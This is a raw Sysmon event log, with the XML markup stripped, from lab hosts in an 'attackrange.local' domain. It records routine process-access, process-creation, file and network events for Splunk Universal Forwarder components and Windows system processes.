AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061317Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:23.146{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A0AE181D058C3646FB6DA7E1EF36407,SHA256=5C235383DFF980478911E76630D905DC96ECD67E64FF8DEFED8A938EFB709FBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246049Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.738{CB4067E1-521F-6063-BC22-00000000AF01}37323920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246048Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-521F-6063-BC22-00000000AF01}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246047Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246046Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246045Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246044Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246043Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246042Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246041Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246040Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246039Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246038Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-521F-6063-BC22-00000000AF01}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246037Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-521F-6063-BC22-00000000AF01}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246036Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.629{CB4067E1-521F-6063-BC22-00000000AF01}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246035Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.285{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89295739C09BCCF130F0AE713C547C00,SHA256=8039B6F7BBD55E1B764F12E42AA571044C1F484F70C8DD772A420B5D9ED1C32C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246034Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.223{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57239F8B29C7A7857B9BBC7DCEF89845,SHA256=228712CE1D658D46F9316398F5CBD28D5DC9634E3E92F7C0C4104BD0932F8907,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246033Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:23.066{CB4067E1-521E-6063-BB22-00000000AF01}25003592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061337Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.664{7F8C56E7-5220-6063-2B01-00000000AF01}2188576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061336Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.524{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5220-6063-2B01-00000000AF01}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061335Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.524{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061334Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.524{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061333Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.524{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061332Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.524{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061331Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.524{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-5220-6063-2B01-00000000AF01}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000001061330Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.524{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A183706632BBF4BE4D0C60DD2C2AB96,SHA256=C43511A35E3843ACB8BC74BAF51496F881538BB4C8AB7EBA803ABC12EA103056,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061329Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.524{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5220-6063-2B01-00000000AF01}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061328Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:24.526{7F8C56E7-5220-6063-2B01-00000000AF01}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001061327Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.045{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54822-false10.0.1.12-8000- 10341000x8000000000000000246077Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5220-6063-BE22-00000000AF01}96C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246076Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 